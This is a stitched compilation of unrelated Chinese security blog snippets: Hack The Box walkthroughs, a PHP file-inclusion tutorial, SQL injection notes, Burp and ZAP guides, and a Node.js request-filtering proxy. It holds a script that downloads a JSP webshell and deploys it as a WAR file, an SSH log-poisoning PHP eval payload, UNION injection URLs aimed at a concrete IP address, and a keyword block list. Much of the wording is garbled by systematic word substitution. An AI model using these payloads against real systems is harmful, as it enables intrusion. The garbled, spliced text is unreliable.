首先nmap，发现FTP可匿名登陆，80端口是一个叫PRTG的监控网页，有SMB服务 用anonymous/空明码登陆FTP依据官网文档，尝试找PRTG配置文件是否有敏感信息最终确定在\ProgramData\Paessler\PRTG Network Monitor 下载configuration文件找到用户名明码登陆网页然而失败。最终把2018改为2019登陆胜利 依据版本号搜到可利用的CVE-2018-9276 先到这

easy box. 首先nmap开路： 找到8080端口： Tomcat字典：https://raw.githubusercontent...找到弱口令tomcat:s3cret 部署war包：办法1：官网walkthrough上的： #!/bin/shwget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jspmkdir wshellcp index.jsp wshell/cd wshelljar -cvf ../wshell.war 部署wshell:门路比拟深拿到flag 办法2：msf应用multi/http/tomcat_mgr_upload 办法3： msfvenom生成war包上传war包后nc:

神秘代码大家好 我是周杰伦 明天给大家看个有意思的货色！ 不仅有意思，还能学到常识。 话题从两行（精确的说是一行）神奇的代码聊起： #include <stdio.h>int main[] = { 232,-1065134080,26643,12517440,4278206464,12802064,(int)printf };这是一段C++代码，猜猜看编译运行后，会输入什么？ 可能，你会问：这TM连main函数都没有，能编译胜利？ 还真能！ 咱们别离在Windows平台下的Visual Studio和Linux平台下的 g++ 进行编译，而后别离执行看看成果： Windows下： Linux下： 不仅能编译胜利，还能失常运行，在Windows上输入了一个MZ，在Linux上输入了一个ELF。 相熟PE文件格式的同学可能晓得，MZ是PE文件结尾的标记，另外，ELF也是Linux上的可执行文件结尾的标记。 也就是说：下面这行代码执行后，把所在可执行文件头部的字符串给打印进去了！ 反汇编假相看到这里，你可能有两个问题： 为什么没有main函数还能通过编译？为什么会输入这么一串信息？对于第一个问题，置信大家应该也猜到了个八九不离十。尽管代码中没有main函数，然而有一个main数组啊！会不会跟它有关系？ 是的没错，对于编译器而言，函数也好，变量也好，最终都解决成了一个个的符号Symbol，而编译器并没有辨别这个符号是来自一个函数还是一个数组。所以，咱们用一个main数组，骗过了编译器。 也就是说：编译器把main数组当成了main函数，把main数组中的数据当成了main函数的函数体指令。 而要答复第二个问题，那就得看下这个main数组中的这一段奇怪的数字，到底是一段什么样的代码？ 将main数组中的数值转换成16进制看看，依照一个int变量占4个字节对齐： 再进一步，应用反汇编引擎看看这段16进制数据是什么指令？ 接下来，咱们逐条剖析这些指令。 call $+5 这是一条十分重要的指令，请记住：call指令是在执行函数调用，执行call指令的时候，会将下一条指令的地址压入线程的栈顶，用于函数返回时取出找到回去的路，那下一条是谁？就是上面的pop eax这条指令，所以执行这个call指令时，会把上面那个pop eax指令的地址压入栈顶。 再者，call前面的指标地址是$+5，也就是这条call指令地址+5个字节的中央，同样是上面那条pop eax指令的地址，所以call的指标函数就是紧接着的上面pop eax指令开始的中央。 那这么吃力执行这个call $+5的意义何在？其实就是为了获取以后这段代码所在的内存空间地址，然而又没有方法间接读取指令寄存器EIP的值，所以借助一个call，把这段代码的地址压入到堆栈中，随后再取出来就能晓得这段代码被搁置在内存中哪个地址在执行了。 这个手法，是黑客编写shellcode的习用手腕。 pop eax 留神，执行到这里的时候，线程的栈顶寄存的就是这条指令所在的地位，是下面那条call指令导致的后果。 接着，pop eax，将栈顶寄存的这个地址取出来，放到eax寄存器中。当初eax中寄存的就是以后指令的内存地址了。 add eax, 13h 下面费这么大劲拿到了这个地址有什么用呢？别急，看这条指令，给它加了13h，也就是十进制的19，回头看看main数组那个十六进制字节表，加了19后，正好是main数组最初一个元素所在的地位——外面寄存了printf函数的地址。 所以，截止到这里，后面这三条指令的目标就是为了能拿到printf函数的地址。 push 400000h↵↵拿到printf函数当前，开始调用。这里给printf传了一个参数：0x00400000，也就是要打印的字符串地址。 mov edi, 400000h↵↵这里同样是在给printf函数传参，这里和下面那条，一个通过堆栈传参，一个通过寄存器传参数，是为了同时兼容Windows平台和Linux x64平台上的函数调用约定。 而之所以传递的字符串地址是0x00400000，是因为刚好，这个数字是两个平台上可执行文件加载的默认基地址。 Windows： Linux： (gdb) x /16c 0x004000000x400000: 127 '\177' 69 'E' 76 'L' 70 'F' 2 '\002' 1 '\001' 1 '\001' 0 '\000'0x400008: 0 '\000' 0 '\000' 0 '\000' 0 '\000' 0 '\000' 0 '\000' 0 '\000' 0 '\000'call dword ptr [eax] ...

当初开始HTB打靶之路，做一些记录。 首先NMAP开路解释一下：nmap -sC 依据端口辨认服务主动调用默认脚本nmap --script好了开始 其中值得关注的有445 SMB服务，1433 MSSQL先看看SMB，Linux可应用SMBclient拜访windows零碎公布的共享资源尝试匿名拜访匿名拜访胜利配置文件找到明码 先写到这

1.1.本地复现过后发现url中有一个参数file=/home/task.php，眉头一皱;计上心来，把/home/task.php替换成了../../../../../../etc/passwd接着发送带有php代码的申请，先phpinfo试一试。接着就是蕴含日志了，感觉马上就要腾飞了，后果很忽然，no such file了，又换了几个门路，还是这样。没方法只是试试蕴含一下配置文件，后果….一样。这可咋办，眼瞅着就要getshell了，没门路啊，忽然想到还有一个ssh log能够尝试蕴含一下，立即来了精力头，噼里啪啦一顿敲，食指放在回车键上，当机立断，豁出去了！只见我眼睛一闭，重重按下回车，当我缓缓睁开眼时，悲痛欲绝，终于没有no such file 了接下来就很简略了间接ssh连贯：ssh ‘<?=eval($_REQUEST[1])?>’@remotehost 蕴含ssh log文件，而后执行下命令：id。胜利！ 2.文件蕴含小常识2.1.蕴含函数1、PHP共有4个与文件蕴含相干的函数： include require include_once require_once 2、Include与include_once的区别： （1）Include：会将指定的文件载入并执行外面的程序；反复援用的状况下加载屡次。 例如： 这里include两次1.php文件，所以就会蕴含1.php两次。 （2）Include_once：会将指定的文件载入并执行外面的程序；此行为和include语句相似，惟一区别是如果该文件中曾经被蕴含过，则不会再次蕴含。 例如： 这里include_once了两次1.php文件，但只会蕴含1.php一次。 （3）require和requireonce的用处与下面两个一样，但区别就是require和requireonce会加载页面最开始执行。Include和include_once会按代码程序执行。 2.2.反对的协定和封装协定File:// ——拜访本地文件系统 http(s):// ——拜访HTTP（s）网址 ftp:// ——拜访FTP(s) URLs php:// ——拜访各个输出/输入流（I/O streams） zlib:// ——压缩流 data:// ——数据（RFC 2397） glob:// ——查找匹配的文件门路模式 phar:// ——PHP归档 ssh2:// ——Secure Shell 2 rar:// ——RAR ogg:// ——音频流 expect:// ——解决交互式的流 2.3.罕用伪协定解说： file://（1）这个协定能够展示本地文件系统，默认目录是以后的工作目录。 （2）例如：file:///etc/passwd、file://key.txt php://(1) php://input是个能够拜访申请的原始数据的只读流，能够拜访申请的原始数据的只读流，将post申请中的数据作为php代码执行。 (2) php://filter是一种元封装器，设计用于数据流关上时的筛选过滤利用。 3、phar:// （1）phar://数据流包装器自PHP5.3.0起开始无效 （2）例如：phar://E:/phpstudy/www/1.zip/phpinfo.txt phar://1.zip/phpinfo.txt 2.4.伪协定利用形式小总结: 3.getshell总结3.1.Getshell之session条件：session文件门路已知，且session文件中内容局部可控。 获取session文件门路： 1、session文件的保留门路能够在phpinfo的session.save_path看到。 2、默认门路： /var/lib/php/sess_PHPSESSID /var/lib/php/sess_PHPSESSID ...

大家好，我是冰河~~ 明天给小伙伴们公布一个重大音讯，没错，就是题目说的《冰河的浸透实战笔记》电子书正式面世了，这也是冰河公布的第9本开源电子书了。心急的小伙伴能够间接到文末见获取形式。 不心急的小伙伴就先听我介绍（吹一吹）这本《冰河的浸透实战笔记》电子书。 只管将笔记整顿成电子书花了我不到两天的工夫，然而笔记的内容却前前后后花了我3~4年的工夫。在这本电子书中，冰河精挑细选了一些根底浸透常识和实战内容，不偏实践，重实战，间接实操上手的实战案例，让零根底的小伙伴也能上手进行实战。 本书特点全网首个开源的以实战案例为背景的浸透实战笔记，全书共442页，共计37万字（不计空格）。 整本书的内容涵盖：Kali根底、浸透工具、木马制作、钓鱼链接生成、爆破明码、内存溢出攻打、web浸透、数据提权、社会工程学。 本书为冰河总结的浸透实战笔记，没有太多的哗众取巧的修辞手法和夸大的图片形容，有的仅仅是纯技术实战的干货笔记内容，通过精挑细选整顿而成的电子书，浏览本书时，须要小伙伴们静下心来，抛开杂念，急躁领会书中的每一项技术。只有这样，你能力更好的了解和把握书中波及的每项技术，能力更好的领会冰河在记录笔记和整顿电子书时的那份激情和心情。 写作本书的原因其实，很早就想写一本对于浸透方面的书籍，事实中却总是因为这样或者那样的起因被搁浅了。 平时我会在我的公众号（冰河技术，大家能够关注下）和博客里分享一些浸透相干的文章，不少小伙伴也在公众号后盾留言让我零碎整顿下。最近，我也在一些读者群里调研了下，大家对于浸透（网络攻防）这个话题很感兴趣。其实，除了这些，也有不少读者反馈说，一些培训网络安全课程的培训机构，一些集体写的免费专栏，很多间接搬运了我公开发表的浸透文章，这着实让人怄气。 为了可能让小伙伴们更加零碎的理解浸透技术，从而进步网络信息的安全意识，乃至为网络信息安全作出本人的一份奉献，冰河再忙也要把这本笔记整理出来分享给大家。 另外，信息安全始终都是互联网行业一个十分重要的话题，很多时候，不得不说，那些肆意毁坏网络环境的骇客们有着很强的技术能力。为了更好的保护网络环境的平安，咱们也不得不充沛理解那些骇客们的攻击方式，只有如此，咱们能力在此基础上找到更好的进攻计划和进攻伎俩。 本书以实战的形式列举了大量骇客们应用的攻击方式，绝大部分来自于冰河本身总结的成绩，少部分来源于互联网，并经冰河亲自验证整顿。 所以说，本书也有局部内容是站在前人的肩膀上实现的，在此，感激那些为了网络的平安默默付出的前辈们。 本书内容精选 如何获取本书？我曾经把电子书上传到CSDN啦，小伙伴们间接下载就好啦，下载链接如下所示。 https://download.csdn.net/download/l1028386804/18830348其余最初，从新统计下，购买了《海量数据处理与大数据技术实战》和《MySQL技术大全：开发、优化与运维实战》的小伙伴们私聊我，我从新拉你进专有技术交换群。 大家在浏览《冰河的浸透实战笔记》这本书的过程中，有任何问题都能够在文末留言或者加我微信：sun_shine_lyz私聊，我看到后都会为大家一一解答。好了，明天就到这儿吧，我是冰河，咱们下期见~~

CanMeng-Web安全渗透三周年啦! 因此推出一套全新渗透安全课程. 欢迎各位小伙伴们加入学习！ 本培训为私人中心 百度首页第一页排名第五 搜索首页第一页排名第九 有任何问题都可以联系我. CanMeng个人博客.知乎.简书.CSDN等平台 都会定时发布各类技术文章 欢迎各位订阅+关注，共同努力进步. 联系咨询Q1426470161 !

Cendertron，动态爬虫与敏感信息泄露检测Cendertron = Crawler + RendertronCendertron https://url.wx-coder.cn/HinPM 是基于 Puppeteer 的 Web 2.0 动态爬虫与敏感信息泄露检测工具。其依托于 xe-crawler 的通用爬虫、调度与缓存模型，新增了 Monkey Test 以及 Request Intercept 等特性，以期尽可能多地挖掘页面与请求。同时针对渗透测试的场景，Cendertron 内置了目录扫描、敏感文件扫描的能力，能够模拟用户实际在浏览器登录状态下的自定义字典爆破。Cendertron 在大量实践的基础上设置了自身的去重策略，能够尽可能地避免重复爬取，加快扫描速度。Cendertron 同时也是正在闭源开发的 Chaos-Scanner 模块化安全扫描解决方案的一部分，为基础扫描与智能扫描提供前置输入。 Usage | 使用Locally Development | 本地开发在本地开发中，我们只需要如正常的 Node 项目一样启动，其会使用 Puppeteer 内置的 Headless Chrome 来执行界面渲染操作： $ git clone https://github.com/wx-chevalier/Chaos-Scanner$ cd cendertron$ yarn install$ npm run dev启动之后可以按提示打开浏览器界面： 这里我们可以以 DVWA 作为测试目标，在输入框内输入 http://localhost:8082/ 然后执行爬取，即可得到如下结果： { "isFinished": true, "metrics": { "executionDuration": 116177, "spiderCount": 51, "depth": 4 }, "spiderMap": { "http://localhost:8082/vulnerabilities/csrf/": [ { "url": "http://localhost:8082/vulnerabilities/view_source.php?id=csrf&security=low", "parsedUrl": { "host": "localhost:8082", "pathname": "/vulnerabilities/view_source.php", "query": { "id": "csrf", "security": "low" } }, "hash": "localhost:8082#/vulnerabilities/view_source.php#idsecurity", "resourceType": "document" } // ... ] }}需要说明的是，因为 DVWA 是需要登录后爬取，因此如果想进行完整的测试请参考下文的 POST 方式创建任务。 ...

事出有因最近web系统引来了黑客的攻击，经常被扫描，各种漏洞尝试。分析攻击日志，有几种常见的攻击手段： 上传webshell远程执行命令漏洞sql注入xxs 攻击试探各种开源框架爆出来的漏洞分析攻击信息的特点说白了就是采用web渗透技术，利用http请求，黑客想尽办法，在http header ,body,等部分植入非法的命令，非法字符常见的有：exe,cmd,powershell,download,select,union,delete等等。 解决问题思路我们能不能开发个代理服务器，来分析http请求header,body里面的信息，如果有非法字符，就截断，拒绝服务。配置允许请求的白名单，拒绝非法Url.网络拓扑http proxy 拦截非法请求，拒绝服务。 技术选型常见的代理服务器有nginx,apache，不知道这2个代理服务器能不能灵活的配置，过滤，转发，没有深入了解。因此选用nodejs http-proxy。 nodejs优点轻量级快速部署灵活开发高吞吐，异步io编码实现逻辑图 绝对干货，分享代码代码依赖http-proxy 1.17.0https://github.com/nodejitsu/... 代码地址 "colors": "~0.6.2",var util = require('util'), colors = require('colors'), http = require('http'), httpProxy = require('./node_modules/http-proxy'); fs = require("fs");var welcome = [ '# # ##### ##### ##### ##### ##### #### # # # #', '# # # # # # # # # # # # # # # # ', '###### # # # # ##### # # # # # # ## # ', '# # # # ##### ##### ##### # # ## # ', '# # # # # # # # # # # # # ', '# # # # # # # # #### # # # '].join('\n');Date.prototype.Format = function(fmt) { //author: meizz var o = { "M+": this.getMonth() + 1, //月份 "d+": this.getDate(), //日 "h+": this.getHours(), //小时 "m+": this.getMinutes(), //分 "s+": this.getSeconds(), //秒 "S": this.getMilliseconds() //毫秒 }; if (/(y+)/.test(fmt)) fmt = fmt.replace(RegExp.$1, (this.getFullYear() + "").substr(4 - RegExp.$1.length)); for (var k in o) if (new RegExp("(" + k + ")").test(fmt)) fmt = fmt.replace(RegExp.$1, (RegExp.$1.length == 1) ? (o[k]) : (("00" + o[k]).substr(("" + o[k]).length))); return fmt;}// 非法字符var re = /php|exe|cmd|shell|select|union|delete|update|insert/;/** 这里配置转发 */var proxyPassConfig = { "/hello": "http://www.qingmiaokeji.cn ", "/": "http://127.0.0.1/"}var logRootPath ="g:/httpproxy/";console.log(welcome.rainbow.bold);function getCurrentDayFile(){ // console.log(logRootPath+"access_"+(new Date()).Format("yyyy-MM-dd")+".log"); return logRootPath+"access_"+(new Date()).Format("yyyy-MM-dd")+".log";}//// Basic Http Proxy Server//var proxy = httpProxy.createProxyServer({});var server = http.createServer(function (req, res) { appendLog(req) var postData = ""; req.addListener('end', function(){ //数据接收完毕 console.log(postData); if(!isValid(postData)){//post请求非法参数 invalidHandler(res) } }); req.addListener('data', function(postDataStream){ postData += postDataStream }); var result = isValid(req.url) //验证http头部是否非法 for(key in req.headers){ result = result&& isValid(req.headers[key]) } if (result) { var patternUrl = urlHandler(req.url); console.log("patternUrl:" + patternUrl); if (patternUrl) { proxy.web(req, res, {target: patternUrl}); } else { noPattern(res); } } else { invalidHandler(res) }});proxy.on('error', function (err, req, res) { res.writeHead(500, { 'Content-Type': 'text/plain' }); res.end('Something went wrong.');});/** * 验证非法参数 * @param value * @returns {boolean} 非法返回False */function isValid(value) { return re.test(value) ? false : true;}/** * 请求转发 * @param url * @returns {*} */function urlHandler(url) { var tempUrl = url.substring(url.lastIndexOf("/")); return proxyPassConfig[tempUrl];}function invalidHandler(res) { res.writeHead(400, {'Content-Type': 'text/plain'}); res.write('Bad Request '); res.end();}function noPattern(res) { res.writeHead(404, {'Content-Type': 'text/plain'}); res.write('not found'); res.end();}function getClientIp(req){ return req.headers['x-forwarded-for'] || req.connection.remoteAddress || req.socket.remoteAddress || req.connection.socket.remoteAddress;}function appendLog(req) { console.log("request url:" + req.url); var logData = (new Date()).Format("yyyy-MM-dd hh:mm:ss")+" "+getClientIp(req)+" "+req.method+ " "+req.url+"\n"; fs.exists(logRootPath,function(exists){ if(!exists){ fs.mkdirSync(logRootPath) } fs.appendFile(getCurrentDayFile(),logData,'utf8',function(err){ if(err) { console.log(err); } }); })}console.log("listening on port 80".green.bold)server.listen(80);思路扩展拦截非法字符后可以发邮件通知管理员可以把日志发送到日志系统，进行大数据分析增加频繁访问，拒绝Ip功能。 可以利用redis 过期缓存实现。

在经历了判断是否存在注入点及确定回显点后， 查询数据库的一些信息查所有的数据库名（table_name）和表名(table_schema) 统计每个库中表的数量，其中information_shcema.tables是记录了所有表名的表 查dvwa库中的表名 查表的字段名 查询字段内容 或

数据库用户：user（）操作系统：@@version_compile_os MySQL注入文件操作：load_file('文件地址') 读取函数into outfile() 写入函数网站路径的获取： 报错显示 搜索引擎 读取配置文件，CMS爆路径漏洞报错遗留文件 字典猜解

判断注入点id=1'，在1后面加'，页面出错id=1 and 1=1正常，id=1 and 1=2，页面出错id=1 and 1='1'正常，id=1 and 1='1'页面出错注：通过构造错误的语句，根据返回结果来判断是否存在注入点 手动注入判断字段数id =1 order by x，x=1，2，3，4，·······，按第1，2，3，4，······列进行排序判断回显点union select 1,2,3,4,5,6,7,8,9,10,11 from admin,1，2，3，4...，这里的几个数字纯粹是凑数的，凑够和union关键字前面的那个表的字段数一样，不然没法拼接成一个表。在sql注入的时候，在将相应位置替换成你想获得的数据，查询结果后面就会显示出来;效果是from当前字段对应的服务器端的一张表。权限肯定有限制，所以要看返回的数字才能确定哪一列可以回显到客户端，而不是随便哪一列都能利用的。比如服务器返回3，说明第3列可以回显查询相关内容猜表名 union select 1，2，3，4，5，6，7，8，9，10 from 表名 如果不报错，则该表存在猜字段名->查询字段内容union select 1，2，3，4，password，6，7，8，9，10 from 表名 如果不报错，则该字段存在实战目标链接：http://120.203.13.75:6815/index.php 找注入点： http://120.203.13.75:6815/index.php?id=1 and 1=2判断字段数 http://120.203.13.75:6815/index.php?id=1 order by 21、2均正常显示，3的时候出现异常，则当前表的字段数为2 判断回显点 http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1，2 查相关内容（一定要在回显点处查看！） 查数据库名 http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1，database() 查数据库版本 http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1，version（） 查表名 http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 ...

安装证书打开burpsuite，设置好代理。端口8080，但是打开https的网站却因为证书问题无法访问 这需要我们为浏览器手动安装CA证书，两种方法： 在burpsuite中 选certificate in DER format就足够了，不要选Private，里面包含有个人的隐私信息容易泄密。 next，设置证书保存路径，next，close 在已经打开burpsuite代理的情况下。在浏览器中打开http://burp，可以看到有生成CA证书的选项，点击 保存下来。 现在我们有了证书，开始导入证书 alt弹出菜单edit ,Preferences ,Advanced ,Certificates ,view Certificates import导入刚才的证书 截断功能安装完证书之后，访问www.baidu.com,此时浏览器并没有显示出页面，因为burpsuite默认开启了截断功能intercept is on，浏览器中不会马上打开 如果想访问这个网址点forward，如果想跳过这个网址点drop,不断地按forward，就会不断地弹出页面内容，加载完毕，forward就会变灰；burpsuite默认情况下开启request的截断模式，不截断response。打开配置选项可以看到具体的配置内容，可以看到默认勾选截断request，不勾选截断response。默认勾选的 是因为这几项的内容通常存在安全隐患的可能性较低。还有个比较重要的， 这两项一定要勾选上，头长度不是固定不变的，勾选不容易出错。返回的页面中有时候会包含有隐藏的域，里面包含一些隐藏的信息，显示隐藏的信息勾选unhide hidden form fields，如果想激活一些禁用的表单，勾选enable hidden form fields 匹配和替换头信息 随便选中一个edit 可以看到请求头一旦满足匹配条件就替换成如果修改一下： 向目标发一个请求，在history中查看刚才的请求，original request，存储着原始的请求头，auto-modified request可以看到修改之后的头 刚才不断点forward的过程中，浏览器和服务器端真正产生过的流量可以在HTTP history这里体现 还可以在target中查看，其中的信息有两种，一种是黑色的，一种是灰色的，黑色的表示真正产生过访问请求的，灰色是经过url爬网爬出来的，只说明有这个url，但是没有发起访问请求。 这样显示的内容过多，有时会进行信息的过滤，右击感兴趣的url add to scope 添加以后，点选红框所示白条，勾选show only in-scope items，然后随便点一下鼠标就会更新配置， 就会只显示刚才加到scope中的内容 可以在scope中看到生成的正则表达式，下面红框是排除一些页面 加注释 爬网为了爬网更加顺畅，先关掉截断功能 先进行手动爬网：进到目标页面需要点的地方和输入的地方去操作一下，在spider下就能看到爬网的记录 自动爬网 当你爬网时需要登录身份验证时，提示输入，也可以勾选自动填入 ...

Zend attack proxy 是一款 web application 集成渗透测试和漏洞工具，同样是免费开源跨平台的。OWASP_ZPA 支持截断代理，主动、被动扫描，Fuzzy，暴力破解并且提供 API。OWASP_ZPA 是Kali Web Top 10 之一。 截断代理首次启动 OWASP_ZAP　会提示是否将 session 进行保存，以及如何保存。 OWASP_ZAP 默认监听的是 8080 端口，并且在启动 ZAP 的时候便会自动开始监听。因此，只需设置浏览器代理，ZAP 便会自动爬取所有数据。 主动扫描ZAP 最简单的使用方式便是在首页直接输入目标 Target 然后点击 攻击 便会开始主动扫描了。 Fuzzer通过右键选择某个特定页面进行 Fuzzer。此外，也可以选择工具菜单中的 Fuzz 进行 Fuzzing 。 数据库注入 Fuzzing选择可能存在 SQL 注入的可疑字符串，为其添加 PayLoads 进行 SQL Injection Fuzzing。 fuzzing 完整以后，可以通过 Code ,Size Resp.Header 等字段属性对 fuzzing 的结果进行筛选。 页面目录Fuzzing首先选中需要替换的字符串，然后点击 Fuzz Locations 中的 Add 选中以选择 fuzzing 的方式。 ...

1.FoxyProxy Standard FoxyProxy 是一个高级的代理管理插件。它能够提高firefox的内置代理的兼容性。这儿也有一些其它的相似类型的代理管理插件。但是它可以提供更多的功能。基于URL的参数，它可以从一个或多个代理之间转换。当代理在使用时，它还可以显示一个动画的图标。假如你要想看这个工具使用过的代理，你就可以查看它的日志。 链接地址：https://addons.mozilla.org/en... 2.Firebug Firebug是一个好的插件，它集成了web开发工具。使用这个工具，你可以编辑和调试页面上的HTML,CSS和javascript，然后查看任何的更改所带来的影响。它能够帮助我们分析JS文件来发现XSS缺陷。用来发现基于DOM的XSS缺陷，Firebug是相当有用的。链接地址：https://addons.mozilla.org/en... 3.Web Developer Web Developer是另外一个好的插件，能为浏览器添加很多web开发工具。当然在渗透渗透测试中也能帮上忙。链接地址：https://addons.mozilla.org/de... 4.User Agent Switcher 该插件是在浏览器上增加一个菜单和一个工具条按钮。如果你想改变useragent, 使用这个工具条和按钮就可以了。该插件可以帮助我们在执行一些攻击时做到欺骗的目的。链接地址：https://addons.mozilla.org/en... 5.Live HTTP Headers 该插件是相当有用的渗透测试插件。它实时的现实每一个http请求和http响应的headers.当然你也可以通过点击位于左侧角落的按钮来保存header信息。多余的话就不多说了。重要性大家都知道。链接地址：https://addons.mozilla.org/en... 6.Tamper Data Tamper Data和上面的LiveHTTP Header类似。但Temper Data有header编辑的功能。使用该插件，你可以查看，编辑HTTP/HTTPSHeader和post 参数。它还可以通过更改headerdata被用于执行XSS和SQL注入攻击。链接地址：https://addons.mozilla.org/en... 7.Hackbar Hackbar是一个简单的渗透测试工具。它能帮助我们测试简单的SQL注入和XSS漏洞。你不能使用它来执行标准的exploits，但是你可以使用它来测试缺陷存在与否。你可以手动的提交带有GET和POST的表单数据。它还有加密和编码的功能。大部分情况下，这个工具可以帮助我们使用编码的payload测试XSS缺陷。它还支持键盘快捷键方式来执行多种任务。我很确定，大多数安全领域的伙计们都知道这个工具。这个工具能用来发现POSTXSS缺陷。因为它可以手动发送POSTData到任何你喜欢的页面。这样的话，你就可以绕过客户端页面的验证。如果你的payload将在客户端编码，你可以使用编码工具来编码你的payload,然后执行攻击。如果应用易受到XSS攻击，我非常确信你将在Hackbar的帮助下找到这个缺陷点。链接地址：https://addons.mozilla.org/en... 8.WebSecurity WebSecurity是一个不错的渗透测试工具。我们已经在前面的文章中介绍过这个工具栏。WebSecurity可以检测大多数常见的web应用缺陷。这个工具可以容易的检测XSS，SQL注入和其它web应用缺陷。不像其它所列举的工具，websecurity完完全全是一个渗透测试工具。链接地址：https://addons.mozilla.org/en... 9.Add N Edit Cookies Add N Edit Cookies是一个cookie编辑插件，它允许你在浏览器中添加和编辑cookie数据。使用这个插件，你可以轻松的手动添加session 数据。这个工具可以在当你拥有活动的用户的session数据时执行session 劫持 攻击。编辑你的cookie添加数据并劫持该帐户。链接地址：https://addons.mozilla.org/en... 10.XSS Me 跨站点脚本攻击是最常见的web应用缺陷。在一个web应用中检测XSS缺陷，这个插件应该是一个有用的工具。XSSMe常常用于发现反射型的XSS缺陷。它扫描页面中所有的表单，然后在所选择的页面上使用预定义的XSSPayloads执行攻击。在扫描完成以后，它会列出所有的页面，这些页面会显示payload.这些页面可能易受到XSS攻击。现在你可以手动测试web页面去发现XSS缺陷存在与否。链接地址：https://addons.mozilla.org/en... 11.SQL Inject Me SQL Inject Me 也是一个不错的Firefox插件，常常被用于查找Web应用的SQL注入缺陷。这个工具不能利用缺陷，但是能够显示它是存在的。SQL注入是最具伤害的web应用缺陷之一，它孕育攻击者查看，更改，编辑，添加或删除数据库中的记录。这个工具向表单中发送一些未被过滤的字符串，然后尝试搜索数据库的错误信息。如果它发现数据库的错误信息，它就会标记该页面是易受攻击的页面。QA测试人员可以使用这个工具作为SQL注入的测试。链接地址：https://addons.mozilla.org/en... 12.FlagFox FlagFox 是另外一个有趣的插件。一旦安装到浏览器，它就会显示一个国旗用来告知web服务器的位置。它同时也包含其它功能，如：whois,WOTscorecard 和 ping. 链接地址：https://addons.mozilla.org/en... 13.CrytoFox CrytoFox是一个加密和解密的工具。它支持绝大多数的加密算法。因此你可以轻易的使用支持的加密算法加密和解密数据。这个插件有字典攻击的支持，可以破解MD5的密码。虽然对它的评论不太好，但它的作用还是令人满意的。链接地址：https://addons.mozilla.org/en... 14.Access Me Access Me是另外一个专业的安全测试插件。这个插件是由XSS Me 和SQLInject Me同一家公司开发的。该插件是用来测试web应用的访问缺陷的。这个工具是通过发送一些不同版本的页面请求来工作的。带有HTTPHEAD的请求和由SECCOM组成的请求将会被发送。一个有session和HEAD/SECCOM的集合同样也会被发送。链接地址：https://addons.mozilla.org/en... ...

netstat命令是一个监控TCP/IP网络的非常有用的工具，它可以显示路由表、实际的网络连接以及每一个网络接口设备的状态信息。 语法选项 netstat [选项]-a或--all：显示所有连线中的Socket； -A<网络类型>或--<网络类型>：列出该网络类型连线中的相关地址； -c或--continuous：持续列出网络状态； -C或--cache：显示路由器配置的快取信息； -e或--extend：显示网络其他相关信息； -F或--fib：显示FIB； -g或--groups：显示多重广播功能群组组员名单； -h或--help：在线帮助； -i或--interfaces：显示网络界面信息表单； -l或--listening：显示监控中的服务器的Socket； -M或--masquerade：显示伪装的网络连线； -n或--numeric：直接使用ip地址，而不通过域名服务器； -N或--netlink或--symbolic：显示网络硬件外围设备的符号连接名称； -o或--timers：显示计时器； -p或--programs：显示正在使用Socket的程序识别码和程序名称； -r或--route：显示Routing Table； -s或--statistice：显示网络工作信息统计表； -t或--tcp：显示TCP传输协议的连线状况； -u或--udp：显示UDP传输协议的连线状况； -v或--verbose：显示指令执行过程； -V或--version：显示版本信息； -w或--raw：显示RAW传输协议的连线状况； -x或--unix：此参数的效果和指定"-A unix"参数相同； --ip或--inet：此参数的效果和指定"-A inet"参数相同。例子列出所有端口情况 [root@xiesshavip002 ~]# netstat -a # 列出所有端口[root@xiesshavip002 ~]# netstat -at # 列出所有TCP端口[root@xiesshavip002 ~]# netstat -au # 列出所有UDP端口列出所有处于监听状态的 Sockets [root@xiesshavip002 ~]# netstat -l # 只显示监听端口[root@xiesshavip002 ~]# netstat -lt # 显示监听TCP端口[root@xiesshavip002 ~]# netstat -lu # 显示监听UDP端口[root@xiesshavip002 ~]# netstat -lx # 显示监听UNIX端口显示每个协议的统计信息 ...

skipfish是一个Linux下的web安全评估扫描工具，支持自定义字典扫描，可学习字典规则，识别漏洞危险级别（sql注入、shell注入、xss），并且提供可视化的统计结果，题主通常与sqlmap 组合使用，对web应用进行上线前的安全扫描和检测。具有速度快、启发式内容识别、误报率低、可生成报告等优点。 扫描方法skipfish -o text http://1.1.1.1 #使用skipfish扫描http://1.1.1.1 ,并将结果保存在text文档里skipfish -o text @url.txt #创建一个TXT格式的URL文档目录并批量扫描文档中的urlskipfish -o test -S complet.wl -W a.wl http://1.1.1.1 # -S使用字典 （有些网站隐藏里某些界面 -S可以通过预先设置的字典来扫描网站隐藏的界面,后缀名为wl的是skipfish用的字典）-W 发现隐藏目录并形成字典-I（大写i）只检查包含“字段”的url-X 不检查包含“字段”的url 如：logout-K 不对指定参数进行fuzz（模糊测试）测试-D 跨站点爬另外一个域-l（小写L）每秒最大请求-m 每ip最大并发连接数--config 指定配置文件身份认证身份认证提供多种方式： skipfish -A user：pass -o test http://1.1.1.1 #在基本身份认证的情况下使用开关 -A加用户名和密码 进行身份认证skipfish -C “name=val” -o test http://1.1.1.1 #使用cookies进行身份认证 使用开关 -C 加 name=val ，一个-C带一个cookie提交账户密码表单方式：--auth-form指定登录地址--auth-user指定登录用户--auth-pass指定登录密码--auth-user-field指定用户名表单--auth-pass-field指定密码表单--auth-form-target指定提交到的页面

